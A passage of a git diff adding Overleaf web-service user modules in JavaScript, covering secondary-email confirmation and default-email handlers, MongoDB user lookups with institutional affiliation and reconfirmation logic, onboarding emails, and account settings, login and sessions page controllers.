SessionManager.getLoggedInUserId(req.session) + + if (!req.session.pendingSecondaryEmail) { + const redirectURL = + AuthenticationController.getRedirectFromSession(req) || '/project' + return res.redirect(redirectURL) + } + + AnalyticsManager.recordEventForUserInBackground( + userId, + 'confirm-secondary-email-page-displayed' + ) + + res.render('user/confirmSecondaryEmail', { + email: req.session.pendingSecondaryEmail.email, + }) +} + +async function addSecondaryEmailPage(req, res) { + const userId = SessionManager.getLoggedInUserId(req.session) + + const confirmedEmails = + await UserGetter.promises.getUserConfirmedEmails(userId) + + if (confirmedEmails.length >= 2) { + const redirectURL = + AuthenticationController.getRedirectFromSession(req) || '/project' + return res.redirect(redirectURL) + } + + AnalyticsManager.recordEventForUserInBackground( + userId, + 'add-secondary-email-page-displayed' + ) + + res.render('user/addSecondaryEmail') +} + +async function primaryEmailCheckPage(req, res) { + const userId = SessionManager.getLoggedInUserId(req.session) + const user = await UserGetter.promises.getUser(userId, { + lastPrimaryEmailCheck: 1, + signUpDate: 1, + email: 1, + emails: 1, + }) + + if (!UserPrimaryEmailCheckHandler.requiresPrimaryEmailCheck(user)) { + return res.redirect('/project') + } + + AnalyticsManager.recordEventForUserInBackground( + userId, + 'primary-email-check-page-displayed' + ) + const { variant } = await SplitTestHandler.promises.getAssignment( + req, + res, + 'auth-pages-bs5' + ) + + const template = + variant === 'enabled' + ? 
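      // [editor's note] Split-test gating: the 'auth-pages-bs5' assignment
      // fetched above picks between the Bootstrap-5 and legacy templates.
      // Minimal sketch of the same pattern (the test name and any variant
      // other than 'enabled' are assumptions):
      //
      //   const { variant } = await SplitTestHandler.promises.getAssignment(
      //     req, res, 'some-test' // hypothetical split test
      //   )
      //   const view = variant === 'enabled' ? 'new-template' : 'old-template'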
'user/primaryEmailCheck-bs5'
+      : 'user/primaryEmailCheck'
+
+  res.render(template)
+}
+
+async function primaryEmailCheck(req, res) {
+  const userId = SessionManager.getLoggedInUserId(req.session)
+  await UserUpdater.promises.updateUser(userId, {
+    $set: { lastPrimaryEmailCheck: new Date() },
+  })
+
+  AnalyticsManager.recordEventForUserInBackground(
+    userId,
+    'primary-email-check-done'
+  )
+
+  // We want to redirect to prompt a user to add a secondary email if their primary
+  // is an institutional email and they don't already have a secondary.
+  if (Features.hasFeature('saas') && req.capabilitySet.has('add-affiliation')) {
+    const confirmedEmails =
+      await UserGetter.promises.getUserConfirmedEmails(userId)
+
+    if (confirmedEmails.length < 2) {
+      const { email: primaryEmail } = SessionManager.getSessionUser(req.session)
+      const primaryEmailDomain = EmailHelper.getDomain(primaryEmail)
+
+      const institution = (
+        await Modules.promises.hooks.fire(
+          'getInstitutionViaDomain',
+          primaryEmailDomain
+        )
+      )?.[0]
+
+      if (institution) {
+        return AsyncFormHelper.redirect(req, res, '/user/emails/add-secondary')
+      }
+    }
+  }
+
+  AsyncFormHelper.redirect(req, res, '/project')
+}
+
+async function showConfirm(req, res, next) {
+  res.render('user/confirm_email', {
+    token: req.query.token,
+    title: 'confirm_email',
+  })
+}
+
+async function remove(req, res) {
+  const userId = SessionManager.getLoggedInUserId(req.session)
+  const email = EmailHelper.parseEmail(req.body.email)
+  if (!email) {
+    return res.sendStatus(422)
+  }
+  const auditLog = {
+    initiatorId: userId,
+    ipAddress: req.ip,
+  }
+  await UserUpdater.promises.removeEmailAddress(userId, email, auditLog)
+  res.sendStatus(200)
+}
+
+async function setDefault(req, res, next) {
+  const userId = SessionManager.getLoggedInUserId(req.session)
+  const email = EmailHelper.parseEmail(req.body.email)
+
+  if (!email) {
+    return res.sendStatus(422)
+  }
+
+  const { emails, email: oldDefault } = await UserGetter.promises.getUser(
+    userId,
+    { email: 1, emails: 1 }
+  )
+  const primaryEmailData = emails?.find(email => email.email === oldDefault)
+  const deleteOldEmail =
+    req.query['delete-unconfirmed-primary'] !== undefined &&
+    primaryEmailData &&
+    !primaryEmailData.confirmedAt
+
+  const auditLog = {
+    initiatorId: userId,
+    ipAddress: req.ip,
+  }
+  try {
+    await UserUpdater.promises.setDefaultEmailAddress(
+      userId,
+      email,
+      false,
+      auditLog,
+      true,
+      deleteOldEmail
+    )
+  } catch (err) {
+    return UserEmailsController._handleEmailError(err, req, res, next)
+  }
+  SessionManager.setInSessionUser(req.session, { email })
+  const user = SessionManager.getSessionUser(req.session)
+  try {
+    await UserSessionsManager.promises.removeSessionsFromRedis(
+      user,
+      req.sessionID // remove all sessions except the current session
+    )
+  } catch (err) {
+    logger.warn(
+      { err },
+      'failed revoking secondary sessions after changing default email'
+    )
+  }
+  if (
+    req.query['delete-unconfirmed-primary'] !== undefined &&
+    primaryEmailData &&
+    !primaryEmailData.confirmedAt
+  ) {
+    await UserUpdater.promises.removeEmailAddress(
+      userId,
+      primaryEmailData.email,
+      {
+        initiatorId: userId,
+        ipAddress: req.ip,
+        extraInfo: {
+          info: 'removed unconfirmed email after setting new primary',
+        },
+      }
+    )
+  }
+  res.sendStatus(200)
+}
+
+const UserEmailsController = {
+  list(req, res, next) {
+    const userId = SessionManager.getLoggedInUserId(req.session)
+    UserGetter.getUserFullEmails(userId, function (error, fullEmails) {
+      if (error) {
+        return next(error)
+      }
+
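      // [editor's note] Request sketch for setDefault (above): the old
      // primary is removed only when the caller opts in via the
      // `delete-unconfirmed-primary` query flag AND that address was never
      // confirmed. The path is an assumption; the flag name and the
      // confirmedAt check come from the handler itself:
      //
      //   POST /user/emails/default?delete-unconfirmed-primary
      //   { "email": "ada@new-primary.example" }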
res.json(fullEmails) + }) + }, + + add: expressify(add), + + addWithConfirmationCode: expressify(addWithConfirmationCode), + + checkNewSecondaryEmailConfirmationCode: expressify( + checkNewSecondaryEmailConfirmationCode + ), + + checkExistingEmailConfirmationCode: expressify( + checkExistingEmailConfirmationCode + ), + + resendNewSecondaryEmailConfirmationCode: expressify( + resendNewSecondaryEmailConfirmationCode + ), + + resendExistingSecondaryEmailConfirmationCode: expressify( + resendExistingSecondaryEmailConfirmationCode + ), + + remove: expressify(remove), + + setDefault: expressify(setDefault), + + endorse(req, res, next) { + const userId = SessionManager.getLoggedInUserId(req.session) + const email = EmailHelper.parseEmail(req.body.email) + if (!email) { + return res.sendStatus(422) + } + + endorseAffiliation( + userId, + email, + req.body.role, + req.body.department, + function (error) { + if (error) { + return next(error) + } + res.sendStatus(204) + } + ) + }, + + resendConfirmation: expressify(resendConfirmation), + + sendReconfirmation: expressify(sendReconfirmation), + + sendExistingSecondaryEmailConfirmationCode: expressify( + sendExistingSecondaryEmailConfirmationCode + ), + + addSecondaryEmailPage: expressify(addSecondaryEmailPage), + + confirmSecondaryEmailPage: expressify(confirmSecondaryEmailPage), + + primaryEmailCheckPage: expressify(primaryEmailCheckPage), + + primaryEmailCheck: expressify(primaryEmailCheck), + + showConfirm: expressify(showConfirm), + + confirm(req, res, next) { + const { token } = req.body + if (!token) { + return res.status(422).json({ + message: req.i18n.translate('confirmation_link_broken'), + }) + } + UserEmailsConfirmationHandler.confirmEmailFromToken( + req, + token, + function (error, userData) { + if (error) { + if (error instanceof Errors.ForbiddenError) { + res.status(403).json({ + message: { + key: 'confirm-email-wrong-user', + text: `We can’t confirm this email. 
You must be logged in with the Overleaf account that requested the new secondary email.`, + }, + }) + } else if (error instanceof Errors.NotFoundError) { + res.status(404).json({ + message: req.i18n.translate('confirmation_token_invalid'), + }) + } else { + next(error) + } + } else { + const { userId, email } = userData + const tokenPrefix = token.substring(0, AUDIT_LOG_TOKEN_PREFIX_LENGTH) + UserAuditLogHandler.addEntry( + userId, + 'confirm-email', + userId, + req.ip, + { token: tokenPrefix, email }, + auditLogError => { + if (auditLogError) { + logger.error( + { error: auditLogError, userId, token: tokenPrefix }, + 'failed to add audit log entry' + ) + } + UserGetter.getUser( + userData.userId, + { email: 1 }, + function (error, user) { + if (error) { + logger.error( + { error, userId: userData.userId }, + 'failed to get user' + ) + } + const isPrimary = user?.email === userData.email + AnalyticsManager.recordEventForUserInBackground( + userData.userId, + 'email-verified', + { + provider: 'email', + verification_type: 'link', + isPrimary, + } + ) + res.sendStatus(200) + } + ) + } + ) + } + } + ) + }, + + _handleEmailError(error, req, res, next) { + if (error instanceof Errors.UnconfirmedEmailError) { + return HttpErrorHandler.conflict(req, res, 'email must be confirmed') + } else if (error instanceof Errors.EmailExistsError) { + const message = req.i18n.translate('email_already_registered') + return HttpErrorHandler.conflict(req, res, message) + } else if (error.message === '422: Email does not belong to university') { + const message = req.i18n.translate('email_does_not_belong_to_university') + return HttpErrorHandler.conflict(req, res, message) + } + next(error) + }, +} + +module.exports = UserEmailsController diff --git a/services/web/app/src/Features/User/UserGetter.js b/services/web/app/src/Features/User/UserGetter.js new file mode 100644 index 0000000..34d758a --- /dev/null +++ b/services/web/app/src/Features/User/UserGetter.js @@ -0,0 +1,343 @@ +const { callbackify } = require('util') +const { db } = require('../../infrastructure/mongodb') +const moment = require('moment') +const settings = require('@overleaf/settings') +const { promisifyAll } = require('@overleaf/promise-utils') +const { + promises: InstitutionsAPIPromises, +} = require('../Institutions/InstitutionsAPI') +const InstitutionsHelper = require('../Institutions/InstitutionsHelper') +const Errors = require('../Errors/Errors') +const Features = require('../../infrastructure/Features') +const { User } = require('../../models/User') +const { normalizeQuery, normalizeMultiQuery } = require('../Helpers/Mongo') + +function _lastDayToReconfirm(emailData, institutionData) { + const globalReconfirmPeriod = settings.reconfirmNotificationDays + if (!globalReconfirmPeriod) return undefined + + // only show notification for institutions with reconfirmation enabled + if (!institutionData || !institutionData.maxConfirmationMonths) + return undefined + + if (!emailData.confirmedAt) return undefined + + if (institutionData.ssoEnabled && !emailData.samlProviderId) { + // For SSO, only show notification for linked email + return false + } + + // reconfirmedAt will not always be set, use confirmedAt as fallback + const lastConfirmed = emailData.reconfirmedAt || emailData.confirmedAt + + return moment(lastConfirmed) + .add(institutionData.maxConfirmationMonths, 'months') + .toDate() +} + +function _pastReconfirmDate(lastDayToReconfirm) { + if (!lastDayToReconfirm) return false + return moment(lastDayToReconfirm).isBefore() +} + +function 
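// [editor's note] Worked example for _lastDayToReconfirm/_pastReconfirmDate
// above and the notification window computed below, with assumed settings
// (reconfirmNotificationDays = 14, institution maxConfirmationMonths = 12):
//
//   confirmedAt          2024-01-15
//   lastDayToReconfirm   2025-01-15  // confirmedAt + 12 months
//   notificationStarts   2025-01-01  // lastDayToReconfirm - 14 days
//   pastReconfirmDate    true once "today" is after 2025-01-15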
_emailInReconfirmNotificationPeriod( + cachedLastDayToReconfirm, + lastDayToReconfirm +) { + const globalReconfirmPeriod = settings.reconfirmNotificationDays + + if (!globalReconfirmPeriod || !cachedLastDayToReconfirm) return false + + const notificationStarts = moment(cachedLastDayToReconfirm).subtract( + globalReconfirmPeriod, + 'days' + ) + + let isInNotificationPeriod = moment().isAfter(notificationStarts) + + if (!isInNotificationPeriod) { + // for possible issues in v1/v2 date mismatch, ensure v2 date doesn't show as needing to reconfirm + + const notificationStartsV2 = moment(lastDayToReconfirm).subtract( + globalReconfirmPeriod, + 'days' + ) + + isInNotificationPeriod = moment().isAfter(notificationStartsV2) + } + + return isInNotificationPeriod +} + +async function getUserFullEmails(userId) { + const user = await UserGetter.promises.getUser(userId, { + email: 1, + emails: 1, + samlIdentifiers: 1, + }) + + if (!user) { + throw new Error('User not Found') + } + + if (!Features.hasFeature('affiliations')) { + return decorateFullEmails(user.email, user.emails, [], []) + } + + const affiliationsData = + await InstitutionsAPIPromises.getUserAffiliations(userId) + + return decorateFullEmails( + user.email, + user.emails || [], + affiliationsData, + user.samlIdentifiers || [] + ) +} + +async function getUserConfirmedEmails(userId) { + const user = await UserGetter.promises.getUser(userId, { + emails: 1, + }) + + if (!user) { + throw new Error('User not Found') + } + + return user.emails.filter(email => !!email.confirmedAt) +} + +async function getSsoUsersAtInstitution(institutionId, projection) { + if (!projection) { + throw new Error('missing projection') + } + + return await User.find( + { + 'samlIdentifiers.providerId': institutionId.toString(), + }, + projection + ).exec() +} + +const UserGetter = { + getSsoUsersAtInstitution: callbackify(getSsoUsersAtInstitution), + + getUser(query, projection, callback) { + if (arguments.length === 2) { + callback = projection + projection = {} + } + try { + query = normalizeQuery(query) + db.users.findOne(query, { projection }, callback) + } catch (err) { + callback(err) + } + }, + + getUserFeatures(userId, callback) { + this.getUser(userId, { features: 1 }, (error, user) => { + if (error) return callback(error) + if (!user) return callback(new Errors.NotFoundError('user not found')) + callback(null, user.features) + }) + }, + + getUserEmail(userId, callback) { + this.getUser(userId, { email: 1 }, (error, user) => + callback(error, user && user.email) + ) + }, + + getUserFullEmails: callbackify(getUserFullEmails), + + getUserConfirmedEmails: callbackify(getUserConfirmedEmails), + + getUserByMainEmail(email, projection, callback) { + email = email.trim() + if (arguments.length === 2) { + callback = projection + projection = {} + } + db.users.findOne({ email }, { projection }, callback) + }, + + getUserByAnyEmail(email, projection, callback) { + email = email.trim() + if (arguments.length === 2) { + callback = projection + projection = {} + } + // $exists: true MUST be set to use the partial index + const query = { emails: { $exists: true }, 'emails.email': email } + db.users.findOne(query, { projection }, (error, user) => { + if (error || user) { + return callback(error, user) + } + + // While multiple emails are being rolled out, check for the main email as + // well + this.getUserByMainEmail(email, projection, callback) + }) + }, + + getUsersByAnyConfirmedEmail(emails, projection, callback) { + if (arguments.length === 2) { + callback = projection 
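    // [editor's note] The arguments.length check above makes the
    // projection parameter optional, so both call shapes work:
    //
    //   UserGetter.getUsersByAnyConfirmedEmail(emails, callback)
    //   UserGetter.getUsersByAnyConfirmedEmail(emails, { email: 1 }, callback)
    //
    // Note also getUserByAnyEmail above: its `emails: { $exists: true }`
    // clause is required, per its comment, for the query to be served by a
    // partial index (the index definition itself is not shown in this diff).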
+ projection = {} + } + + const query = { + 'emails.email': { $in: emails }, // use the index on emails.email + emails: { + $exists: true, + $elemMatch: { + email: { $in: emails }, + confirmedAt: { $exists: true }, + }, + }, + } + + db.users.find(query, { projection }).toArray(callback) + }, + + getUsersByV1Ids(v1Ids, projection, callback) { + if (arguments.length === 2) { + callback = projection + projection = {} + } + const query = { 'overleaf.id': { $in: v1Ids } } + db.users.find(query, { projection }).toArray(callback) + }, + + getUsersByHostname(hostname, projection, callback) { + const reversedHostname = hostname.trim().split('').reverse().join('') + const query = { + emails: { $exists: true }, + 'emails.reversedHostname': reversedHostname, + } + db.users.find(query, { projection }).toArray(callback) + }, + + getInstitutionUsersByHostname(hostname, callback) { + const projection = { + _id: 1, + email: 1, + emails: 1, + samlIdentifiers: 1, + } + UserGetter.getUsersByHostname(hostname, projection, (err, users) => { + if (err) return callback(err) + + users.forEach(user => { + user.emails = decorateFullEmails( + user.email, + user.emails, + [], + user.samlIdentifiers || [] + ) + }) + callback(null, users) + }) + }, + + getUsers(query, projection, callback) { + try { + query = normalizeMultiQuery(query) + db.users.find(query, { projection }).toArray(callback) + } catch (err) { + callback(err) + } + }, + + // check for duplicate email address. This is also enforced at the DB level + ensureUniqueEmailAddress(newEmail, callback) { + this.getUserByAnyEmail(newEmail, function (error, user) { + if (user) { + return callback(new Errors.EmailExistsError()) + } + callback(error) + }) + }, +} + +const decorateFullEmails = ( + defaultEmail, + emailsData, + affiliationsData, + samlIdentifiers +) => { + emailsData.forEach(function (emailData) { + emailData.default = emailData.email === defaultEmail + + const affiliation = affiliationsData.find( + aff => aff.email === emailData.email + ) + if (affiliation) { + const { + institution, + inferred, + role, + department, + licence, + cached_confirmed_at: cachedConfirmedAt, + cached_reconfirmed_at: cachedReconfirmedAt, + past_reconfirm_date: cachedPastReconfirmDate, + entitlement: cachedEntitlement, + portal, + } = affiliation + const lastDayToReconfirm = _lastDayToReconfirm(emailData, institution) + let { last_day_to_reconfirm: cachedLastDayToReconfirm } = affiliation + if (institution.ssoEnabled && !emailData.samlProviderId) { + // only SSO linked emails are reconfirmed at SSO institutions + cachedLastDayToReconfirm = undefined + } + const pastReconfirmDate = _pastReconfirmDate(lastDayToReconfirm) + const inReconfirmNotificationPeriod = _emailInReconfirmNotificationPeriod( + cachedLastDayToReconfirm, + lastDayToReconfirm + ) + emailData.affiliation = { + institution, + inferred, + inReconfirmNotificationPeriod, + lastDayToReconfirm, + cachedConfirmedAt, + cachedLastDayToReconfirm, + cachedReconfirmedAt, + cachedEntitlement, + cachedPastReconfirmDate, + pastReconfirmDate, + role, + department, + licence, + portal, + } + } + + if (emailData.samlProviderId) { + emailData.samlIdentifier = samlIdentifiers.find( + samlIdentifier => samlIdentifier.providerId === emailData.samlProviderId + ) + } + + emailData.emailHasInstitutionLicence = + InstitutionsHelper.emailHasLicence(emailData) + + const lastConfirmedAtStr = emailData.reconfirmedAt || emailData.confirmedAt + emailData.lastConfirmedAt = lastConfirmedAtStr + ? 
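    // [editor's note] Hedged sketch of one element this decorator yields,
    // assembled from the assignments above (values illustrative):
    //
    //   {
    //     email: 'ada@cs.example.com',
    //     default: true,                       // matches the user's primary
    //     affiliation: { institution, inferred, role, department, licence,
    //                    lastDayToReconfirm, inReconfirmNotificationPeriod,
    //                    pastReconfirmDate, /* cached* fields */ portal },
    //     samlIdentifier: { providerId: '...' }, // only if SSO-linked
    //     emailHasInstitutionLicence: false,
    //     lastConfirmedAt: Date,               // reconfirmedAt || confirmedAt
    //   }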
moment(lastConfirmedAtStr).toDate() + : null + }) + + return emailsData +} + +UserGetter.promises = promisifyAll(UserGetter, { + without: ['getSsoUsersAtInstitution', 'getUserFullEmails'], +}) +UserGetter.promises.getUserFullEmails = getUserFullEmails +UserGetter.promises.getSsoUsersAtInstitution = getSsoUsersAtInstitution + +module.exports = UserGetter diff --git a/services/web/app/src/Features/User/UserHandler.js b/services/web/app/src/Features/User/UserHandler.js new file mode 100644 index 0000000..cdd2e51 --- /dev/null +++ b/services/web/app/src/Features/User/UserHandler.js @@ -0,0 +1,31 @@ +const { callbackify, promisify } = require('@overleaf/promise-utils') +const TeamInvitesHandler = require('../Subscription/TeamInvitesHandler') +const { + db, + READ_PREFERENCE_SECONDARY, +} = require('../../infrastructure/mongodb') + +function populateTeamInvites(user, callback) { + TeamInvitesHandler.createTeamInvitesForLegacyInvitedEmail( + user.email, + callback + ) +} + +async function countActiveUsers() { + const oneYearAgo = new Date() + oneYearAgo.setFullYear(oneYearAgo.getFullYear() - 1) + return await db.users.countDocuments( + { lastActive: { $gte: oneYearAgo } }, + { readPreference: READ_PREFERENCE_SECONDARY } + ) +} + +module.exports = { + populateTeamInvites, + countActiveUsers: callbackify(countActiveUsers), +} +module.exports.promises = { + populateTeamInvites: promisify(populateTeamInvites), + countActiveUsers, +} diff --git a/services/web/app/src/Features/User/UserInfoController.js b/services/web/app/src/Features/User/UserInfoController.js new file mode 100644 index 0000000..4eeea4f --- /dev/null +++ b/services/web/app/src/Features/User/UserInfoController.js @@ -0,0 +1,86 @@ +const UserGetter = require('./UserGetter') +const SessionManager = require('../Authentication/SessionManager') +const { ObjectId } = require('mongodb-legacy') + +function getLoggedInUsersPersonalInfo(req, res, next) { + const userId = SessionManager.getLoggedInUserId(req.session) + if (!userId) { + return next(new Error('User is not logged in')) + } + UserGetter.getUser( + userId, + { + first_name: true, + last_name: true, + role: true, + institution: true, + email: true, + signUpDate: true, + }, + function (error, user) { + if (error) { + return next(error) + } + sendFormattedPersonalInfo(user, res, next) + } + ) +} + +function getPersonalInfo(req, res, next) { + let query + const userId = req.params.user_id + + if (/^\d+$/.test(userId)) { + query = { 'overleaf.id': parseInt(userId, 10) } + } else if (/^[a-f0-9]{24}$/.test(userId)) { + query = { _id: new ObjectId(userId) } + } else { + return res.sendStatus(400) + } + + UserGetter.getUser( + query, + { _id: true, first_name: true, last_name: true, email: true }, + function (error, user) { + if (error) { + return next(error) + } + if (!user) { + return res.sendStatus(404) + } + sendFormattedPersonalInfo(user, res, next) + } + ) +} + +function sendFormattedPersonalInfo(user, res, next) { + const info = formatPersonalInfo(user) + res.json(info) +} + +function formatPersonalInfo(user) { + if (!user) { + return {} + } + const formattedUser = { id: user._id.toString() } + for (const key of [ + 'first_name', + 'last_name', + 'email', + 'signUpDate', + 'role', + 'institution', + ]) { + if (user[key]) { + formattedUser[key] = user[key] + } + } + return formattedUser +} + +module.exports = { + getLoggedInUsersPersonalInfo, + getPersonalInfo, + sendFormattedPersonalInfo, + formatPersonalInfo, +} diff --git a/services/web/app/src/Features/User/UserInfoManager.js 
b/services/web/app/src/Features/User/UserInfoManager.js new file mode 100644 index 0000000..7133cf0 --- /dev/null +++ b/services/web/app/src/Features/User/UserInfoManager.js @@ -0,0 +1,18 @@ +const UserGetter = require('./UserGetter') +const { callbackify } = require('@overleaf/promise-utils') + +async function getPersonalInfo(userId) { + return UserGetter.promises.getUser(userId, { + _id: true, + first_name: true, + last_name: true, + email: true, + }) +} + +module.exports = { + getPersonalInfo: callbackify(getPersonalInfo), + promises: { + getPersonalInfo, + }, +} diff --git a/services/web/app/src/Features/User/UserOnboardingEmailManager.js b/services/web/app/src/Features/User/UserOnboardingEmailManager.js new file mode 100644 index 0000000..dd984c4 --- /dev/null +++ b/services/web/app/src/Features/User/UserOnboardingEmailManager.js @@ -0,0 +1,29 @@ +const Queues = require('../../infrastructure/Queues') +const EmailHandler = require('../Email/EmailHandler') +const UserUpdater = require('./UserUpdater') +const UserGetter = require('./UserGetter') +const Settings = require('@overleaf/settings') + +const ONE_DAY_MS = 24 * 60 * 60 * 1000 + +async function scheduleOnboardingEmail(user) { + await Queues.createScheduledJob( + 'emails-onboarding', + { data: { userId: user._id } }, + ONE_DAY_MS + ) +} + +async function sendOnboardingEmail(userId) { + const user = await UserGetter.promises.getUser({ _id: userId }, { email: 1 }) + if (Settings.enableOnboardingEmails && user) { + await EmailHandler.promises.sendEmail('userOnboardingEmail', { + to: user.email, + }) + await UserUpdater.promises.updateUser(user._id, { + $set: { onboardingEmailSentAt: new Date() }, + }) + } +} + +module.exports = { scheduleOnboardingEmail, sendOnboardingEmail } diff --git a/services/web/app/src/Features/User/UserPagesController.mjs b/services/web/app/src/Features/User/UserPagesController.mjs new file mode 100644 index 0000000..6f7bb78 --- /dev/null +++ b/services/web/app/src/Features/User/UserPagesController.mjs @@ -0,0 +1,341 @@ +import UserGetter from './UserGetter.js' +import OError from '@overleaf/o-error' +import UserSessionsManager from './UserSessionsManager.js' +import logger from '@overleaf/logger' +import Settings from '@overleaf/settings' +import AuthenticationController from '../Authentication/AuthenticationController.js' +import SessionManager from '../Authentication/SessionManager.js' +import NewsletterManager from '../Newsletter/NewsletterManager.js' +import SubscriptionLocator from '../Subscription/SubscriptionLocator.js' +import _ from 'lodash' +import { expressify } from '@overleaf/promise-utils' +import Features from '../../infrastructure/Features.js' +import SplitTestHandler from '../SplitTests/SplitTestHandler.js' +import Modules from '../../infrastructure/Modules.js' + +async function settingsPage(req, res) { + const userId = SessionManager.getLoggedInUserId(req.session) + const reconfirmationRemoveEmail = req.query.remove + // SSO + const ssoError = req.session.ssoError + if (ssoError) { + delete req.session.ssoError + } + const ssoErrorMessage = req.session.ssoErrorMessage + if (ssoErrorMessage) { + delete req.session.ssoErrorMessage + } + const projectSyncSuccessMessage = req.session.projectSyncSuccessMessage + if (projectSyncSuccessMessage) { + delete req.session.projectSyncSuccessMessage + } + // Institution SSO + let institutionLinked = _.get(req.session, ['saml', 'linked']) + if (institutionLinked) { + // copy object if exists because _.get does not + institutionLinked = Object.assign( + { + 
hasEntitlement: _.get(req.session, ['saml', 'hasEntitlement']), + }, + institutionLinked + ) + } + const samlError = _.get(req.session, ['saml', 'error']) + const institutionEmailNonCanonical = _.get(req.session, [ + 'saml', + 'emailNonCanonical', + ]) + const institutionRequestedEmail = _.get(req.session, [ + 'saml', + 'requestedEmail', + ]) + + const reconfirmedViaSAML = _.get(req.session, ['saml', 'reconfirmed']) + delete req.session.saml + let shouldAllowEditingDetails = true + if (Settings.ldap && Settings.ldap.updateUserDetailsOnLogin) { + shouldAllowEditingDetails = false + } + if (Settings.saml && Settings.saml.updateUserDetailsOnLogin) { + shouldAllowEditingDetails = false + } + const oauthProviders = Settings.oauthProviders || {} + + const user = await UserGetter.promises.getUser(userId) + if (!user) { + // The user has just deleted their account. + return UserSessionsManager.removeSessionsFromRedis( + { _id: userId }, + null, + () => res.redirect('/') + ) + } + + let personalAccessTokens + try { + const results = await Modules.promises.hooks.fire( + 'listPersonalAccessTokens', + user._id + ) + personalAccessTokens = results?.[0] ?? [] + } catch (error) { + const err = OError.tag(error, 'listPersonalAccessTokens hook failed') + logger.error({ err, userId }, err.message) + } + + let currentManagedUserAdminEmail + try { + currentManagedUserAdminEmail = + await SubscriptionLocator.promises.getAdminEmail(req.managedBy) + } catch (err) { + logger.error({ err }, 'error getting subscription admin email') + } + + let memberOfSSOEnabledGroups = [] + try { + memberOfSSOEnabledGroups = + ( + await Modules.promises.hooks.fire( + 'getUserGroupsSSOEnrollmentStatus', + user._id, + { teamName: 1 }, + ['email'] + ) + )?.[0] || [] + memberOfSSOEnabledGroups = memberOfSSOEnabledGroups.map(group => { + return { + groupId: group._id.toString(), + linked: group.linked, + groupName: group.teamName, + adminEmail: group.admin_id?.email, + } + }) + } catch (error) { + logger.error( + { err: error }, + 'error fetching groups with Group SSO enabled the user may be member of' + ) + } + + res.render('user/settings', { + title: 'account_settings', + user: { + id: user._id, + isAdmin: user.isAdmin, + email: user.email, + allowedFreeTrial: user.allowedFreeTrial, + first_name: user.first_name, + last_name: user.last_name, + alphaProgram: user.alphaProgram, + betaProgram: user.betaProgram, + labsProgram: user.labsProgram, + features: { + dropbox: user.features.dropbox, + github: user.features.github, + mendeley: user.features.mendeley, + zotero: user.features.zotero, + papers: user.features.papers, + references: user.features.references, + }, + refProviders: { + mendeley: Boolean(user.refProviders?.mendeley), + zotero: Boolean(user.refProviders?.zotero), + papers: Boolean(user.refProviders?.papers), + }, + writefull: { + enabled: Boolean(user.writefull?.enabled), + }, + aiErrorAssistant: { + enabled: Boolean(user.aiErrorAssistant?.enabled), + }, + }, + labsExperiments: user.labsExperiments ?? [], + hasPassword: !!user.hashedPassword, + shouldAllowEditingDetails, + oauthProviders: UserPagesController._translateProviderDescriptions( + oauthProviders, + req + ), + institutionLinked, + samlError, + institutionEmailNonCanonical: + institutionEmailNonCanonical && institutionRequestedEmail + ? 
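+          // (illustrative: this only surfaces a warning when the user asked
+          // to link one address, e.g. Jo@Uni.edu, and the identity provider
+          // asserted a different canonical form, e.g. jo@uni.edu)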
institutionEmailNonCanonical + : undefined, + reconfirmedViaSAML, + reconfirmationRemoveEmail, + samlBeta: req.session.samlBeta, + ssoErrorMessage, + thirdPartyIds: UserPagesController._restructureThirdPartyIds(user), + projectSyncSuccessMessage, + personalAccessTokens, + emailAddressLimit: Settings.emailAddressLimit, + isManagedAccount: !!req.managedBy, + userRestrictions: Array.from(req.userRestrictions || []), + currentManagedUserAdminEmail, + gitBridgeEnabled: Settings.enableGitBridge, + isSaas: Features.hasFeature('saas'), + memberOfSSOEnabledGroups, + }) +} + +async function accountSuspended(req, res) { + if (SessionManager.isUserLoggedIn(req.session)) { + return res.redirect('/project') + } + res.render('user/accountSuspended', { + title: 'your_account_is_suspended', + }) +} + +async function reconfirmAccountPage(req, res) { + const pageData = { + reconfirm_email: req.session.reconfirm_email, + } + const { variant } = await SplitTestHandler.promises.getAssignment( + req, + res, + 'auth-pages-bs5' + ) + + const template = + variant === 'enabled' ? 'user/reconfirm-bs5' : 'user/reconfirm' + + res.render(template, pageData) +} + +const UserPagesController = { + accountSuspended: expressify(accountSuspended), + + registerPage(req, res) { + const sharedProjectData = req.session.sharedProjectData || {} + + const newTemplateData = {} + if (req.session.templateData != null) { + newTemplateData.templateName = req.session.templateData.templateName + } + + res.render('user/register', { + title: 'register', + sharedProjectData, + newTemplateData, + samlBeta: req.session.samlBeta, + }) + }, + + loginPage(req, res) { + // if user is being sent to /login with explicit redirect (redir=/foo), + // such as being sent from the editor to /login, then set the redirect explicitly + if ( + req.query.redir != null && + AuthenticationController.getRedirectFromSession(req) == null + ) { + AuthenticationController.setRedirectInSession(req, req.query.redir) + } + res.render('user/login', { + title: Settings.nav?.login_support_title || 'login', + login_support_title: Settings.nav?.login_support_title, + login_support_text: Settings.nav?.login_support_text, + }) + }, + + /** + * Landing page for users who may have received one-time login + * tokens from the read-only maintenance site. + * + * We tell them that Overleaf is back up and that they can login normally. 
+ */ + oneTimeLoginPage(req, res, next) { + res.render('user/one_time_login') + }, + + renderReconfirmAccountPage: expressify(reconfirmAccountPage), + + settingsPage: expressify(settingsPage), + + sessionsPage(req, res, next) { + const user = SessionManager.getSessionUser(req.session) + logger.debug({ userId: user._id }, 'loading sessions page') + const currentSession = { + ip_address: user.ip_address, + session_created: user.session_created, + } + UserSessionsManager.getAllUserSessions( + user, + [req.sessionID], + (err, sessions) => { + if (err != null) { + OError.tag(err, 'error getting all user sessions', { + userId: user._id, + }) + return next(err) + } + res.render('user/sessions', { + title: 'sessions', + currentSession, + sessions, + }) + } + ) + }, + + emailPreferencesPage(req, res, next) { + const userId = SessionManager.getLoggedInUserId(req.session) + UserGetter.getUser( + userId, + { _id: 1, email: 1, first_name: 1, last_name: 1 }, + (err, user) => { + if (err != null) { + return next(err) + } + NewsletterManager.subscribed(user, (err, subscribed) => { + if (err != null) { + OError.tag(err, 'error getting newsletter subscription status') + return next(err) + } + res.render('user/email-preferences', { + title: 'newsletter_info_title', + subscribed, + }) + }) + } + ) + }, + + async compromisedPasswordPage(req, res) { + res.render('user/compromised_password') + }, + + _restructureThirdPartyIds(user) { + // 3rd party identifiers are an array of objects + // this turn them into a single object, which + // makes data easier to use in template + if ( + !user.thirdPartyIdentifiers || + user.thirdPartyIdentifiers.length === 0 + ) { + return null + } + return user.thirdPartyIdentifiers.reduce((obj, identifier) => { + obj[identifier.providerId] = identifier.externalUserId + return obj + }, {}) + }, + + _translateProviderDescriptions(providers, req) { + const result = {} + if (providers) { 